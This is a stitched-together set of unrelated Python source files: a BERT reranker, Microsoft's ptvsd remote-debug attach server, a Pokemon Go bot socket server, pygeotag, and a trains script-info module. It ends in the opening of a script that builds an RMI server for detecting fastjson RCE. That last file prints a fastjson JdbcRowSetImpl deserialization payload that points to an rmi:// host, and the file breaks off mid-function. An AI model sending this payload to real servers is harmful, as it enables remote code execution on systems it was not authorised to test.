def run_model(self):
bert_config = modeling.BertConfig.from_json_file(self.bert_config_file)
assert self.max_seq_len <= bert_config.max_position_embeddings
run_config = tf.estimator.RunConfig(model_dir=str(self.data_dir))
model_fn = self.model_fn_builder(
bert_config=bert_config,
num_labels=2,
init_checkpoint=self.checkpoint)
estimator = tf.estimator.Estimator(
model_fn=model_fn,
config=run_config)
result = estimator.predict(input_fn=self.input_fn,
yield_single_examples=True)
for item in result:
self.output_q.put((item["log_probs"], item["label_ids"]))
def feature_generator(self):
tokenizer = tokenization.FullTokenizer(vocab_file=self.vocab_file, do_lower_case=True)
while True:
next = self.input_q.get()
if not next:
break
query, candidates = next
query = tokenization.convert_to_unicode(query)
query_token_ids = tokenization.convert_to_bert_input(
text=query, max_seq_length=self.max_seq_len, tokenizer=tokenizer,
add_cls=True)
for i, doc_text in enumerate(candidates):
doc_token_id = tokenization.convert_to_bert_input(
text=tokenization.convert_to_unicode(doc_text),
max_seq_length=self.max_seq_len - len(query_token_ids),
tokenizer=tokenizer,
add_cls=False)
query_ids = query_token_ids
doc_ids = doc_token_id
input_ids = query_ids + doc_ids
query_segment_id = [0] * len(query_ids)
doc_segment_id = [1] * len(doc_ids)
segment_ids = query_segment_id + doc_segment_id
input_mask = [1] * len(input_ids)
features = {
"input_ids": input_ids,
"segment_ids": segment_ids,
"input_mask": input_mask,
"label_ids": 0
}
yield features
def pad(self, candidates):
if len(candidates) % self.batch_size == 0:
return candidates
else:
candidates += ['PADDING DOC'] * (self.batch_size - (len(candidates) % self.batch_size))
return candidates
def rank(self, query: bytes, choices: List[bytes]) -> List[int]:
actual_length = len(choices)
candidates = self.pad(choices)
self.input_q.put((query, choices))
results = [self.output_q.get() for _ in range(len(candidates))][:actual_length]
log_probs, labels = zip(*results)
log_probs = np.stack(log_probs).reshape(-1, 2)
scores = log_probs[:, 1]
assert len(scores) == actual_length
return scores.argsort()[::-1]
def close(self):
self.input_q.put(None)
self.model_thread.join()
|
attach_server.py
|
# Python Tools for Visual Studio
# Copyright(c) Microsoft Corporation
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the License); you may not use
# this file except in compliance with the License. You may obtain a copy of the
# License at http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY
# IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
__author__ = "Microsoft Corporation <ptvshelp@microsoft.com>"
__version__ = "3.0.0.0"
__all__ = ['enable_attach', 'wait_for_attach', 'break_into_debugger', 'settrace', 'is_attached', 'AttachAlreadyEnabledError']
import atexit
import getpass
import os
import os.path
import platform
import socket
import struct
import sys
import threading
try:
import thread
except ImportError:
import _thread as thread
try:
import ssl
except ImportError:
ssl = None
import ptvsd.visualstudio_py_debugger as vspd
import ptvsd.visualstudio_py_repl as vspr
from ptvsd.visualstudio_py_util import to_bytes, read_bytes, read_int, read_string, write_bytes, write_int, write_string
# The server (i.e. the Python app) waits on a TCP port provided. Whenever anything connects to that port,
# it immediately sends the octet sequence 'PTVSDBG', followed by version number represented as int64,
# and then waits for the client to respond with the same exact byte sequence. After signatures are thereby
# exchanged and found to match, the client is expected to provide a string secret (in the usual debugger
# string format, None/ACII/Unicode prefix + length + data), which can be an empty string to designate the
# lack of a specified secret.
#
# If the secret does not match the one expected by the server, it responds with 'RJCT', and then closes
# the connection. Otherwise, the server responds with 'ACPT', and awaits a 4-octet command. The following
# commands are recognized:
#
# 'INFO'
# Report information about the process. The server responds with the following information, in order:
# - Process ID (int64)
# - Executable name (string)
# - User name (string)
# - Implementation name (string)
# and then immediately closes connection. Note, all string fields can be empty or null strings.
#
# 'ATCH'
# Attach debugger to the process. If successful, the server responds with 'ACPT', followed by process ID
# (int64), and then the Python language version that the server is running represented by three int64s -
# major, minor, micro; From there on the socket is assumed to be using the normal PTVS debugging protocol.
# If attaching was not successful (which can happen if some other debugger is already attached), the server
# responds with 'RJCT' and closes the connection.
#
# 'REPL'
# Attach REPL to the process. If successful, the server responds with 'ACPT', and from there on the socket
# is assumed to be using the normal PTVS REPL protocol. If not successful (which can happen if there is
# no debugger attached), the server responds with 'RJCT' and closes the connection.
PTVS_VER = '2.2'
DEFAULT_PORT = 5678
PTVSDBG_VER = 6 # must be kept in sync with DebuggerProtocolVersion in PythonRemoteProcess.cs
PTVSDBG = to_bytes('PTVSDBG')
ACPT = to_bytes('ACPT')
RJCT = to_bytes('RJCT')
INFO = to_bytes('INFO')
ATCH = to_bytes('ATCH')
REPL = to_bytes('REPL')
_attach_enabled = False
_attached = threading.Event()
vspd.DONT_DEBUG.append(os.path.normcase(__file__))
class AttachAlreadyEnabledError(Exception):
"""`ptvsd.enable_attach` has already been called in this process."""
def enable_attach(secret, address = ('0.0.0.0', DEFAULT_PORT), certfile = None, keyfile = None, redirect_output = True):
"""Enables Python Tools for Visual Studio to attach to this process remotely
to debug Python code.
Parameters
----------
secret : str
Used to validate the clients - only those clients providing the valid
secret will be allowed to connect to this server. On client side, the
secret is prepended to the Qualifier string, separated from the
hostname by ``'@'``, e.g.: ``'secret@myhost.cloudapp.net:5678'``. If
secret is ``None``, there's no validation, and any client can connect
freely.
address : (str, int), optional
Specifies the interface and port on which the debugging server should
listen for TCP connections. It is in the same format as used for
regular sockets of the `socket.AF_INET` family, i.e. a tuple of
``(hostname, port)``. On client side, the server is identified by the
Qualifier string in the usual ``'hostname:port'`` format, e.g.:
``'myhost.cloudapp.net:5678'``. Default is ``('0.0.0.0', 5678)``.
certfile : str, optional
Used to enable SSL. If not specified, or if set to ``None``, the
connection between this program and the debugger will be unsecure,
and can be intercepted on the wire. If specified, the meaning of this
parameter is the same as for `ssl.wrap_socket`.
keyfile : str, optional
Used together with `certfile` when SSL is enabled. Its meaning is the
same as for ``ssl.wrap_socket``.
redirect_output : bool, optional
Specifies whether any output (on both `stdout` and `stderr`) produced
by this program should be sent to the debugger. Default is ``True``.
Notes
-----
This function returns immediately after setting up the debugging server,
and does not block program execution. If you need to block until debugger
is attached, call `ptvsd.wait_for_attach`. The debugger can be detached
and re-attached multiple times after `enable_attach` is called.
This function can only be called once during the lifetime of the process.
On a second call, `AttachAlreadyEnabledError` is raised. In circumstances
where the caller does not control how many times the function will be
called (e.g. when a script with a single call is run more than once by
a hosting app or framework), the call should be wrapped in ``try..except``.
Only the thread on which this function is called, and any threads that are
created after it returns, will be visible in the debugger once it is
attached. Any threads that are already running before this function is
called will not be visible.
"""
if not ssl and (certfile or keyfile):
raise ValueError('could not import the ssl module - SSL is not supported on this version of Python')
if sys.platform == 'cli':
# Check that IronPython was launched with -X:Frames and -X:Tracing, since we can't register our trace
# func on the thread that calls enable_attach otherwise
import clr
x_tracing = clr.GetCurrentRuntime().GetLanguageByExtension('py').Options.Tracing
x_frames = clr.GetCurrentRuntime().GetLanguageByExtension('py').Options.Frames
if not x_tracing or not x_frames:
raise RuntimeError('IronPython must be started with -X:Tracing and -X:Frames options to support PTVS remote debugging.')
global _attach_enabled
if _attach_enabled:
raise AttachAlreadyEnabledError('ptvsd.enable_attach() has already been called in this process.')
_attach_enabled = True
atexit.register(vspd.detach_process_and_notify_debugger)
server = socket.socket(proto=socket.IPPROTO_TCP)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(address)
server.listen(1)
def server_thread_func():
while True:
client = None
raw_client = None
try:
client, addr = server.accept()
if certfile:
client = ssl.wrap_socket(client, server_side = True, ssl_version = ssl.PROTOCOL_TLSv1, certfile = certfile, keyfile = keyfile)
write_bytes(client, PTVSDBG)
write_int(client, PTVSDBG_VER)
response = read_bytes(client, 7)
if response != PTVSDBG:
continue
dbg_ver = read_int(client)
if dbg_ver != PTVSDBG_VER:
continue
client_secret = read_string(client)
if secret is None or secret == client_secret:
write_bytes(client, ACPT)
else:
write_bytes(client, RJCT)
continue
response = read_bytes(client, 4)
if response == INFO:
try:
pid = os.getpid()
except AttributeError:
pid = 0
write_int(client, pid)
exe = sys.executable or ''
write_string(client, exe)
try:
username = getpass.getuser()
except AttributeError:
username = ''
write_string(client, username)
try:
impl = platform.python_implementation()
except AttributeError:
try:
impl = sys.implementation.name
except AttributeError:
impl = 'Python'
major, minor, micro, release_level, serial = sys.version_info
os_and_arch = platform.system()
if os_and_arch == "":
os_and_arch = sys.platform
try:
if sys.maxsize > 2**32:
os_and_arch += ' 64-bit'
else:
os_and_arch += ' 32-bit'
except AttributeError:
pass
version = '%s %s.%s.%s (%s)' % (impl, major, minor, micro, os_and_arch)
write_string(client, version)
# Don't just drop the connection - let the debugger close it after it finishes reading.
client.recv(1)
elif response == ATCH:
debug_options = vspd.parse_debug_options(read_string(client))
if redirect_output:
debug_options.add('RedirectOutput')
if vspd.DETACHED:
write_bytes(client, ACPT)
try:
pid = os.getpid()
except AttributeError:
pid = 0
write_int(client, pid)
major, minor, micro, release_level, serial = sys.version_info
write_int(client, major)
write_int(client, minor)
write_int(client, micro)
vspd.attach_process_from_socket(client, debug_options, report = True)
vspd.mark_all_threads_for_break(vspd.STEPPING_ATTACH_BREAK)
_attached.set()
client = None
else:
write_bytes(client, RJCT)
elif response == REPL:
if not vspd.DETACHED:
write_bytes(client, ACPT)
vspd.connect_repl_using_socket(client)
client = None
else:
write_bytes(client, RJCT)
except (socket.error, OSError):
pass
finally:
if client is not None:
client.close()
server_thread = threading.Thread(target = server_thread_func)
server_thread.setDaemon(True)
server_thread.start()
frames = []
f = sys._getframe()
while True:
f = f.f_back
if f is None:
break
frames.append(f)
frames.reverse()
cur_thread = vspd.new_thread()
for f in frames:
cur_thread.push_frame(f)
def replace_trace_func():
for f in frames:
f.f_trace = cur_thread.trace_func
replace_trace_func()
sys.settrace(cur_thread.trace_func)
vspd.intercept_threads(for_attach = True)
# Alias for convenience of users of pydevd
settrace = enable_attach
def wait_for_attach(timeout = None):
"""If a PTVS remote debugger is attached, returns immediately. Otherwise,
blocks until a remote debugger attaches to this process, or until the
optional timeout occurs.
Parameters
----------
timeout : float, optional
The timeout for the operation in seconds (or fractions thereof).
"""
if vspd.DETACHED:
_attached.clear()
_attached.wait(timeout)
def break_into_debugger():
"""If a PTVS remote debugger is attached, pauses execution of all threads,
and breaks into the debugger with current thread as active.
"""
if not vspd.DETACHED:
vspd.SEND_BREAK_COMPLETE = thread.get_ident()
vspd.mark_all_threads_for_break()
def is_attached():
"""Returns ``True`` if debugger is attached, ``False`` otherwise."""
return not vspd.DETACHED
|
__init__.py
|
from threading import Thread
import os
import logging
from flask import Flask, request, redirect
from flask_socketio import SocketIO, emit
from pokemongo_bot import logger
from pokemongo_bot.event_manager import manager
from plugins.socket import myjson
from plugins.socket import botevents
from plugins.socket import uievents
# pylint: disable=unused-variable, unused-argument
logging.getLogger('socketio').disabled = True
logging.getLogger('engineio').disabled = True
logging.getLogger('werkzeug').disabled = True
def run_socket_server():
app = Flask(__name__)
app.config["SECRET_KEY"] = "OpenPoGoBotSocket"
socketio = SocketIO(app, logging=False, engineio_logger=False, json=myjson)
@app.route("/")
def redirect_online():
return redirect("http://openpogoui.nicontoso.eu")
state = {}
botevents.register_bot_events(socketio, state)
uievents.register_ui_events(socketio, state)
socketio.run(app, host="0.0.0.0", port=8000, debug=False, use_reloader=False, log_output=False)
# prevent starting the thread already on imports
if __name__ == "__init__":
SOCKET_THREAD = Thread(target=run_socket_server)
SOCKET_THREAD.daemon = True
SOCKET_THREAD.start()
|
pygeotag.py
|
# coding=utf8
import sys
isPython3 = sys.version_info >= (3,0,0)
import cgi
import json
import os
import threading
import time
import webbrowser
if isPython3:
import http.server as BaseHTTPServer
else:
import BaseHTTPServer
if isPython3:
import queue as Queue
else:
import Queue
if isPython3:
import urllib.request as urllib
import urllib.parse as urlparse
else:
import urllib2 as urllib
import urlparse
class QueueTimeout(Queue.Queue):
"""from http://stackoverflow.com/questions/1564501/add-timeout-argument-to-pythons-queue-join
by Lukáš Lalinský
"""
class NotFinished(Exception):
pass
def join_with_timeout(self, timeout):
self.all_tasks_done.acquire()
try:
endtime = time.time() + timeout
while self.unfinished_tasks:
remaining = endtime - time.time()
if remaining <= 0.0:
raise self.NotFinished
self.all_tasks_done.wait(remaining)
finally:
self.all_tasks_done.release()
class PyGeoTag(object):
def __init__(self, callback=None, synchronous=False):
self.basedir = os.path.dirname(__file__)
self.synchronous = synchronous
if callback is not None:
self.callback = callback
if synchronous:
self.callback = self._store
self.server_thread = None
self.running = False
self.address = ''
self.port = 8008
self.request_queue = QueueTimeout()
self.data = None
self.syncWait = threading.Condition()
self.server = self.init_server()
# def stop_server(self):
# self.current_server_thread = -1
# time.sleep(self.timeout+1) # wait for server to exit
def start_server(self):
if False and self.synchronous:
pass
else:
self.running = True
self.server_thread = threading.Thread(target=self._run_server)
self.server_thread.start()
def _run_server(self):
while self.running:
self.server.handle_request()
def init_server(self):
class _handler(GeoTagRequestHandler):
owner = self
server_class = BaseHTTPServer.HTTPServer
handler_class = _handler
server_address = (self.address, self.port)
httpd = server_class(server_address, handler_class)
httpd.timeout = 2
return httpd
def stop_server(self):
# make an attempt to empty the queue
for i in range(self.request_queue.qsize()):
try:
self.request_queue.get_nowait()
except Queue.Empty:
pass
self.request_queue.put({'__msg_type':'shutdown'})
time.sleep(2) # wait for the msg to be picked up
self.running = False
def open_server_page(self):
webbrowser.open_new("http://%s:%d/" %
(self.address or "127.0.0.1", self.port))
def callback(self, data):
print(data)
def _store(self, data):
self.data = data
def show_position(self, data={}):
print('SHOWING',data)
data["__msg_type"] = "show_position"
self.request_queue.put(data)
def request_position(self, data={}):
print('REQUESTING',data)
data["__msg_type"] = "request_position"
self.request_queue.put(data)
def get_position(self, data={}):
if not self.synchronous:
self.running = False
raise Exception("Can't call get_position in asynchronous mode")
if not self.running:
raise Exception("Server is not running")
if data:
self.request_position(data)
while True:
try:
self.request_queue.join_with_timeout(2)
except QueueTimeout.NotFinished:
if self.running:
continue
break
return self.data
class GeoTagRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
staticMap = {
"": "template.html",
"jquery.js": "jquery.js",
"map.js": "map.js",
"jquery.json-2.2.min.js": "jquery.json-2.2.min.js",
}
def log_message(*args):
return
def do_GET(self):
if self.path.startswith("/QUIT"):
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write("TERMINATING SERVER".encode('utf-8'))
# threading.Timer(2,self.server.shutdown).start()
self.owner.stop_server()
return
path = self.path.strip('/').split('/')
if len(path) == 1 and path[0] in self.staticMap:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(
os.path.join(self.owner.basedir,self.staticMap[path[0]])).read().encode('utf-8'))
return
if self.path.startswith("/sendPos?"):
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
data = urlparse.parse_qs(urlparse.urlparse(self.path).query)['data'][0]
data = json.loads(data)
was_requested = False
if "__msg_type" in data:
del data["__msg_type"]
was_requested = True
self.owner.callback(data)
if was_requested:
self.owner.request_queue.task_done()
return
if self.path.startswith("/getMessage"):
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
#data = urlparse.parse_qs(urlparse.urlparse(self.path).query)['data'][0]
#print(repr(json.loads(data)))
try:
data = self.owner.request_queue.get_nowait()
except Queue.Empty:
data = {}
self.wfile.write(json.dumps(data).encode('utf-8'))
return
if __name__ == '__main__':
pgt = PyGeoTag(synchronous=True)
pgt.start_server()
time.sleep(1)
pgt.open_server_page()
f = pgt.get_position
f({"description": "Turtles"})
f({"description": "Frogs", 'secret':7})
f({"description": "Otters"})
print("DONE")
if pgt.synchronous:
pgt.stop_server()
|
scriptinfo.py
|
import os
import sys
from tempfile import mkstemp
import attr
import collections
import logging
import json
from furl import furl
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self):
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = get_installed_pkgs_detail()
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(module_callback=ScriptRequirements.add_trains_used_packages)
return self.create_requirements_txt(reqs, local_pks)
except Exception:
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
import boto3
modules.add('boto3', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from google.cloud import storage
modules.add('google_cloud_storage', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from azure.storage.blob import ContentSettings
modules.add('azure_storage_blob', 'trains.storage', 0)
except Exception:
pass
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
import torch.utils.tensorboard
import tensorboard
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower().replace('-', '_')
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = reqs_lower.get(name, (None, None))
if k:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
except:
conda_requirements = ''
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e':
requirements_txt += '{0} {1}\n'.format(k, v.version)
elif v:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
requirements_txt += '{0}\n'.format(k)
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
return requirements_txt, conda_requirements
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
@classmethod
def observer(cls, jupyter_notebook_filename):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from trains import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception:
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
# noinspection PyBroadException
try:
get_ipython().run_line_magic('notebook', local_jupyter_filename)
except Exception as ex:
continue
# get notebook python script
script_code, resources = _script_exporter.from_filename(local_jupyter_filename)
current_script_hash = hash(script_code)
if prev_script_hash and prev_script_hash == current_script_hash:
continue
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
fmodules, _ = file_import_modules(notebook.parts[-1], script_code)
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
installed_pkgs = get_installed_pkgs_detail()
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
task._update_script(script=data_script)
# update requirements
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep+'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except:
server_info = None
if server_info:
break
try:
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
r.raise_for_status()
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = notebook_name
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even oon windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(str(script_path), str(Path.cwd()))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _get_working_dir(cls, repo_root):
repo_root = Path(repo_root).absolute()
try:
return Path.cwd().relative_to(repo_root).as_posix()
except ValueError:
# Working directory not under repository root
return os.path.curdir
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(cls, filepath, check_uncommitted=True, create_requirements=True, log=None):
jupyter_filepath = cls._get_jupyter_notebook_filename()
if jupyter_filepath:
script_path = Path(os.path.normpath(jupyter_filepath)).absolute()
else:
script_path = Path(os.path.normpath(filepath)).absolute()
if not script_path.is_file():
raise ScriptInfoError(
"Script file [{}] could not be found".format(filepath)
)
script_dir = script_path.parent
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
repo_info = DetectionResult()
if not plugin:
log.info("No repository found, storing script code instead")
else:
try:
repo_info = plugin.get_info(str(script_dir), include_diff=check_uncommitted)
except Exception as ex:
_log("no info for {} ({})", script_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", script_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=furl(repo_info.url).remove(username=True, password=True).tostr(),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
)
messages = []
if repo_info.modified:
messages.append(
"======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
script_info.get("repository", "")
)
)
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages),
script_requirements)
@classmethod
def get(cls, filepath=sys.argv[0], check_uncommitted=True, create_requirements=True, log=None):
try:
return cls._get_script_info(
filepath=filepath, check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log)
except Exception as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
|
rmi_server.py
|
#fastjson rce检测之python版rmi服务器搭建
'''
fastjson检测rce时候,常常使用rmi协议。
如果目标通外网,payload可以使用rmi://randomstr.test.yourdomain.com:9999/path,通过dnslog来检测。
但是目标是内网,我们在内网也可以部署rmi server,通过查看日志看是否有主机的请求来检测。
Java 写一个Java的rmi服务挺简单的,但是如果你正在python开发某个项目,而又不想用调用java软件,此文章获取能帮助你。
POST data
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://10.183.20.41:20008/TESTPATH",
"autoCommit":true
}
}
直接贴代码
'''
#!/usr/bin/env python3
import socket
import threading
import struct
def rmi_response(client, address):
try:
client.settimeout(5)
buf = client.recv(1024)
if b"\x4a\x52\x4d\x49" in buf:
